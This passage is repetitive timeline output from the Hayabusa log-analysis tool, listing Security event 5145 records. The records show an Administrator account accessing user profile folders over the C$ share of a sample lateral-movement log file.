10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Pictures\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Desktop : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links for United States\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Pictures : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Contacts\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Videos\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Links : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Videos : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Downloads\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Saved 
Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Documents 
: IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\Administrator.EXAMPLE\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 